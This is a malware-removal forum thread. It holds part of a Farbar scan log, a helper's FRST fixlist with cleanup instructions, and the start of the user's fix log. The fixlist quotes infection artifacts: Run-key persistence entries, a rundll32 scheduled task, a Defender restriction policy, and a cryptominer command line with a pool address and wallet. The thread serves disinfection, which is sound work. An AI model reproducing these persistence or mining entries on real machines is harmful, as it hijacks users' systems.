==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
ShortcutWithArgument: C:\Users\Jpoch\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
 
==================== Loaded Modules (Whitelisted) ==============
 
2017-11-20 23:50 - 2017-11-20 23:50 - 002249216 _____ () C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll
2017-04-15 18:07 - 2015-09-28 21:26 - 000936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2016-11-07 02:21 - 2017-10-10 17:05 - 001267136 ____C () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-04-24 16:07 - 2016-04-24 16:07 - 000094672 ____C () C:\Program Files\TortoiseSVN\bin\libsasl.dll
2016-11-27 09:55 - 2016-11-27 09:55 - 000230064 ____C () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2017-03-18 12:58 - 2017-03-18 12:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 12:59 - 2017-03-18 18:31 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-11-11 18:02 - 2017-11-11 18:02 - 000087552 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-11-11 18:02 - 2017-11-11 18:02 - 000206336 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-11-11 18:02 - 2017-11-11 18:02 - 025461760 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-11-06 21:02 - 2017-11-06 21:02 - 002552832 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\skypert.dll
2017-11-11 18:02 - 2017-11-11 18:02 - 000685056 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_12.8.487.0_x64__kzf8qxf38zg5c\RtmMvrUap.dll
2017-11-15 19:06 - 2017-11-10 01:57 - 004135768 ____C () C:\Program Files (x86)\Google\Chrome\Application\62.0.3202.94\libglesv2.dll
2017-11-15 19:06 - 2017-11-10 01:57 - 000100184 ____C () C:\Program Files (x86)\Google\Chrome\Application\62.0.3202.94\libegl.dll
2017-11-21 00:22 - 2017-11-21 00:22 - 000713216 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
2015-03-26 16:05 - 2015-03-26 16:05 - 000014336 _____ () C:\Users\Jpoch\jagexcache\jagexlauncher\bin\JagexLauncher.exe
2017-04-15 18:07 - 2017-11-21 00:22 - 000034960 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-04-15 18:07 - 2015-09-28 21:26 - 000104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2016-11-07 02:21 - 2017-10-10 17:05 - 001040320 ____C () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-11-21 00:22 - 2017-11-21 00:22 - 000013312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\_isetup\_isdecmp.dll
2017-11-21 00:22 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\itdownload.dll
2016-11-07 02:22 - 2017-10-10 17:05 - 070805952 ____C () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2017-10-28 03:03 - 2017-11-17 15:36 - 000101888 _____ () C:\Program Files (x86)\RuneMate\.install4j\i4jinst.dll
2011-11-10 16:35 - 2011-11-10 16:35 - 003198464 _____ () C:\Users\Jpoch\jagexcache\jagexlauncher\bin\jvm.dll
2011-11-10 17:16 - 2011-11-10 17:16 - 000402944 _____ () C:\Users\Jpoch\jagexcache\jagexlauncher\bin\freetype.dll
2017-10-28 02:53 - 2017-11-21 00:25 - 000066048 ____C () C:\.jagex_cache_32\browsercontrol.dll
2017-10-28 02:54 - 2017-11-21 00:25 - 000132096 _____ () C:\Users\Jpoch\jagexcache\runescape\LIVE\jaclib.dll
2017-10-28 02:54 - 2017-11-21 00:25 - 000076288 _____ () C:\Users\Jpoch\jagexcache\runescape\LIVE\jagdx.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2016-11-07 01:05 - 2017-11-19 02:50 - 000001251 ____C C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 beautifllink.xyz
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img2.jpg
DNS Servers: 75.75.75.75 - 75.75.76.76
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [UDP Query User{E92F6F8F-76D2-4DE4-91F8-6144868393F9}C:\users\jpoch\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jpoch\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{D2B5BD76-C654-4A51-AA48-4ED135F3B1E4}C:\users\jpoch\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jpoch\appdata\roaming\spotify\spotify.exe
FirewallRules: [{941458AE-8A64-48D9-B837-092B4AE13236}] => (Allow) C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\devenv.exe
FirewallRules: [{24A53FF3-DD27-4347-9C96-FCCB5E4D6D81}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{A2EA45C8-52CE-4732-B24F-436E7B45C7C4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{EC76A41C-3A04-410C-BDA5-2274793183BB}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{0BD640A7-41C9-4E70-BFD1-2AF0EB2EBF0B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{53AA577E-403E-43FF-ABE0-F6186DECBB48}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{3AC71C5D-AD36-4BD3-A8FE-C6A1A7C8D816}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{D899C28A-E295-461C-A346-F26DC725158D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{0D93EA6C-BE64-4E57-9E32-755D84E08A5F}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{78CCC814-6A8F-4552-9CD3-935A409A9749}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{06A76B4E-5704-4196-AEB1-E2B56A20F4F8}C:\users\jpoch\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jpoch\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{6E201D26-95CF-4A4D-B469-FB9246A297FE}C:\users\jpoch\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\jpoch\appdata\roaming\spotify\spotify.exe
FirewallRules: [{5F93178E-25A5-466F-AB9E-10B9D25B4A3B}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{42D616D8-A42F-451B-981D-549D4A3408FD}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DC88156E-5C5C-497D-8EE8-D09E1EC849A4}C:\users\jpoch\downloads\downloader_diablo2_enus.exe] => (Allow) C:\users\jpoch\downloads\downloader_diablo2_enus.exe
FirewallRules: [UDP Query User{CCFD1587-166A-4200-A69D-A9066C2A6A31}C:\users\jpoch\downloads\downloader_diablo2_enus.exe] => (Allow) C:\users\jpoch\downloads\downloader_diablo2_enus.exe
FirewallRules: [TCP Query User{E43D4D56-C8CD-4E58-82F1-E7B91485E23A}C:\minionapp\minionapp.exe] => (Allow) C:\minionapp\minionapp.exe
FirewallRules: [UDP Query User{F03180DA-E440-4149-B784-0A41A4C2B40A}C:\minionapp\minionapp.exe] => (Allow) C:\minionapp\minionapp.exe
FirewallRules: [TCP Query User{7A9CB362-D351-4166-8F58-C5295F9CA517}C:\users\jpoch\jagexcache\jagexlauncher\bin\jagexlauncher.exe] => (Allow) C:\users\jpoch\jagexcache\jagexlauncher\bin\jagexlauncher.exe
FirewallRules: [UDP Query User{C17832A5-F222-4348-8ED5-5CA67B299BCF}C:\users\jpoch\jagexcache\jagexlauncher\bin\jagexlauncher.exe] => (Allow) C:\users\jpoch\jagexcache\jagexlauncher\bin\jagexlauncher.exe
FirewallRules: [{972ED9BF-251D-4F1A-BC67-E905CC7C2773}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{7D925423-B978-4B9F-B007-E7F81DE7A0A8}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{1E4F6292-2DB1-4284-AA51-88690F4AB9EC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{212D9828-F84A-4066-873B-836E93A1F61B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{580AD25B-E74C-4E64-80D6-DB0208170C18}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{12FF7A32-ED2A-4D4D-BBC4-8EF4292C6684}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{1AD2AD0C-BC3F-4154-A2A6-221D02EE75B1}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{833A7BC6-B3F9-4E80-9EC8-6F13E659FB86}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{75B2FB30-CD1C-4DA8-8F22-E2F903C14D59}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{BC9EE228-0710-4023-B05B-B3B20A467E33}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{53E96D9F-3D99-43FD-B4B4-6A579459F34D}] => (Allow) C:\Windows\System32\rundll32.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/21/2017 12:10:12 AM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/21/2017 12:10:12 AM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/21/2017 12:10:05 AM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/21/2017 12:10:05 AM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/20/2017 09:25:13 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/20/2017 09:25:13 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/20/2017 09:25:06 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/20/2017 09:25:06 PM) (Source: Microsoft Security Client) (EventID: 5000) (User: )
Description: Event-ID 5000
 
Error: (11/19/2017 03:08:28 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "WmiApRpl" in DLL "C:\WINDOWS\system32\wbem\wmiaprpl.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.
 
Error: (11/19/2017 03:08:28 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: Windows cannot load the extensible counter DLL rdyboost. The first four bytes (DWORD) of the Data section contains the Windows error code.
 
 
System errors:
=============
Error: (11/21/2017 12:22:12 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The CldFlt service failed to start due to the following error: 
The request is not supported.
 
Error: (11/20/2017 10:00:09 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The CldFlt service failed to start due to the following error: 
The request is not supported.
 
Error: (11/20/2017 09:05:24 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The CldFlt service failed to start due to the following error: 
The request is not supported.
 
Error: (11/20/2017 09:03:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA LocalSystem Container service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 8000 milliseconds: Restart the service.
 
Error: (11/20/2017 09:03:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA Display Container LS service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 5000 milliseconds: Restart the service.
 
Error: (11/20/2017 09:03:20 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The SQL Server VSS Writer service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (11/20/2017 09:03:20 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA Telemetry Container service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 1000 milliseconds: Restart the service.
 
Error: (11/20/2017 09:03:20 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The ASUS Com Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (11/20/2017 09:00:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA LocalSystem Container service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 6000 milliseconds: Restart the service.
 
Error: (11/20/2017 09:00:59 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The NVIDIA Display Container LS service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 1000 milliseconds: Restart the service.
 
 
CodeIntegrity:
===================================
  Date: 2017-11-20 23:51:34.374
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2017-11-20 22:46:31.419
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2017-11-20 20:42:09.736
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2017-11-20 19:25:24.177
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.
 
  Date: 2017-11-20 19:25:24.088
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Store signing level requirements.
 
  Date: 2017-11-19 14:01:46.713
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Google\Chrome\Application\chrome.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\mbae64.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2017-09-30 15:40:38.652
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
 
  Date: 2017-09-30 15:40:35.928
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
 
  Date: 2017-08-26 20:59:03.982
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
 
  Date: 2017-08-26 20:58:59.589
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-4790 CPU @ 3.60GHz
Percentage of memory in use: 55%
Total physical RAM: 8135.07 MB
Available physical RAM: 3590.27 MB
Total Virtual: 11975.07 MB
Available Virtual: 6333.87 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:118.46 GB) (Free:11.93 GB) NTFS
Drive d: (New Volume) (Fixed) (Total:931.51 GB) (Free:776.24 GB) NTFS
Drive e: (Win7HP_SP1_64b) (CDROM) (Total:3.11 GB) (Free:0 GB) CDFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 2D14B794)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 119.2 GB) (Disk ID: 21CC4F22)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=118.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
 
==================== End of Addition.txt ============================

 



BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 40,238 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:04:33 AM

Posted 21 November 2017 - 10:11 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

ATTENTION: System Restore is disabled
Turn System Restore On for Drives in Windows 10
http://www.tenforums.com/tutorials/4533-system-protection-turn-off-drives-windows-10-a.html
===

Press the Windows key + r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.
Please copy the entire contents of the code box below to the a new file.
 
start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
(T@@9MGBSB) C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe
( ) C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\TGVYNP5FI0Z.EXE
() C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
(1) C:\Program Files\P4B69KW31G\P4B69KW31.exe
(T@@9MGBSB) C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe
(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe
(T@@9MGBSB) C:\Program Files\LVN8W6E40P\LVN8W6E40.exe
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
HKLM-x32\...\Run: [BOOSTER] => "C:\Users\Jpoch\AppData\Local\PCBooster\booster.exe" -o 188.42.242.221:3333 -u 49YfoE2xWHG1vywX2xTV8XZzBzB1E2QHEF9GtzPKSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C -p WORKER-64-1411 -k -o p (the data entry has 200 more characters).
HKLM\...\RunOnce: [OMEWPRODUCT_A4ZTJ] => C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE [422400 2017-11-20] (T@@9MGBSB) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [1GTGLIO7OYX9UG4] => C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [7571555] => C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\tgvynp5fi0z.exe [529932 2017-11-20] ( )
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [8AXDS40R0VLOMTA] => C:\Program Files\P4B69KW31G\P4B69KW31.exe [840192 2017-11-20] (1)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [ADVOFKIWWU.EXE] => C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe m_1 L_1 <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [LJ3X92T3371CP84] => C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [O6FW1NSS4KFJQRH] => C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Y680XDWS6L0I742] => C:\Program Files\LVN8W6E40P\LVN8W6E40.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [CVAWYW1XG38Q8N7] => C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe [669696 2017-11-21] (LZDZ3UY)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\MountPoints2: {514308f6-a4ca-11e6-ac7b-806e6f6e6963} - "E:\setup.exe"
CHR DefaultSearchURL: Profile 1 -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Profile 1 -> hxxp://srch.bar/?s={searchTerms}
CHR Extension: (Quick Searcher v16.2) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR Extension: (Chrome Cleaner Pro) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccjleegmemocfpghkhpjmiccjcacackp [2017-10-11]
CHR Extension: (Quick Searcher) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR HKLM\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3446151218-491997262-3667861278-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
S1 ZAM; \??\C:\WINDOWS\System32\drivers\zam64.sys [X]
Task: {8AE9CBEE-77EE-45AE-B980-A68EF2B5F072} - System32\Tasks\Yaminguict Explorer for ERC => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll",eWMujhpWxRLj <==== ATTENTION
2017-11-20 23:50 - 2017-11-20 23:50 - 002249216 _____ () C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll
2017-11-21 00:22 - 2017-11-21 00:22 - 000713216 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
2017-11-21 00:22 - 2017-11-21 00:22 - 000013312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\_isetup\_isdecmp.dll
2017-11-21 00:22 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\itdownload.dll
C:\Windows\System32\Tasks\Yaminguict Explorer for ERC
C:\Program Files (x86)\1cqaldhh1t4
C:\Program Files\U9K03QV4LJ
C:\Program Files\8OK3IXWMOC
C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy
C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp
C:\Program Files\P4B69KW31G
C:\Program Files\9F8KN5EJ25
C:\Program Files (x86)\1cqaldhh1t4
C:\Program Files\LVN8W6E40P
C:\Program Files\U9K03QV4LJ
C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4

End
Save the file as fixlist.txt in the same folder where the Farbar tool is running from.
The location is listed in the 3rd line of the Farbar log you have submitted.

Run FRST and click Fix only once and wait.

The tool will create a log (Fixlog.txt) please post it to your reply.
===

Please download Malwarebytes Anti-Malware from here
  • Right-click on the MBAM icon and select Run as administrator to run the tool.
  • Click Yes to accept any security warnings that may appear.
  • Once the MBAM dashboard opens, on the right detail pane click on the word "Current" under the Scan Status to update the tool database.
  • On the left menu pane click the Settings tab, and then select the Protection tab on the top.
  • Under the Scan Options, turn on the button Scan for rootkits and Scan within archives.
  • Click the Scan tab on the right detail pane, select Threat Scan and click the Start Scan button
  • Note: The scan may take some time to finish, so please be patient.
  • If potential threats are detected, ensure to checkmark all the listed items, and click the Quarantine Selected button.
  • While still on the Scan tab, click the View Report button, and in the window that opens click the Export button, select Text file (*.txt), and save the log to your Desktop.
  • The log can also be viewed by clicking the log to select it, then clicking the View Report button.
Please post the log for my review.

Note: If asked to restart the computer, please do so immediately.
===

Reset the browsers that you use and have been compromised.

How To:
https://www.howtogeek.com/171924/how-to-reset-your-web-browser-to-its-default-settings/

====

Please post the logs and let me know what problem persists.

#3 Description

Description
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:33 AM

Posted 21 November 2017 - 03:43 PM

Thank you nasdaq. I really do appreciate your time and help through this!

 

I also ran malware last night after I made this post (sorry if I wasn't supposed to, but I kept getting pop ups that would bring the screen up front and would disrupt what I was doing - had to do something)

 

system restore turned on (thank you for that, no clue how it was even turned off)

 

Also, going to reset the browsers but is there anything else I would need to get them to show up on the search bar again?

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 19-11-2017
Ran by Jpoch (21-11-2017 12:28:08) Run:1
Running from C:\Users\Jpoch\Downloads\FRST
Loaded Profiles: Jpoch (Available Profiles: defaultuser0 & Jpoch)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
 
CreateRestorePoint:
EmptyTemp:
CloseProcesses:
 
(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
(T@@9MGBSB) C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe
( ) C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\TGVYNP5FI0Z.EXE
() C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
